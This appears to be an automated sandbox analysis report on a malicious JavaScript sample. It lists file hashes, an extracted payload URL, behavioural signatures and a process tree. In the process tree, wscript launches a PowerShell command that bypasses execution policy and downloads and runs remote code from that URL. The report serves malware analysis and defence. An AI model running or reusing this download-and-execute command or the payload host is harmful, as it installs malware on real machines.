Analysis
-
max time kernel
120s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
b9a5609f1393d9bd4122adeb4bc317c58060aa898394382449a09345d80c5c4d.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
b9a5609f1393d9bd4122adeb4bc317c58060aa898394382449a09345d80c5c4d.js
Resource
win10v2004-20240226-en
General
-
Target
b9a5609f1393d9bd4122adeb4bc317c58060aa898394382449a09345d80c5c4d.js
-
Size
60KB
-
MD5
f4ac6188df3e45081124740789003495
-
SHA1
58322411a63f617eb0bf5d6486411aa044ff9a21
-
SHA256
b9a5609f1393d9bd4122adeb4bc317c58060aa898394382449a09345d80c5c4d
-
SHA512
9c15c939829f177441bb53616ddd8b2f389345ebb76843cd3f3c3c2e7b44fb8053e6d015e48e904129a43df6aa219d95c7583b189ff8cb46056383d23b4ca0b9
-
SSDEEP
1536:6wHbxzFgBBt9quDrxkLqEgejEmSbC61ik276L02M8pzT37hqW7t2:/Hb1SPXxZejjSbJ1J276L02M8pH37hX0
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2216 powershell.exe 4 2216 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2216 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2216 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1732 wrote to memory of 2216 1732 wscript.exe 28 PID 1732 wrote to memory of 2216 1732 wscript.exe 28 PID 1732 wrote to memory of 2216 1732 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\b9a5609f1393d9bd4122adeb4bc317c58060aa898394382449a09345d80c5c4d.js1⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216
-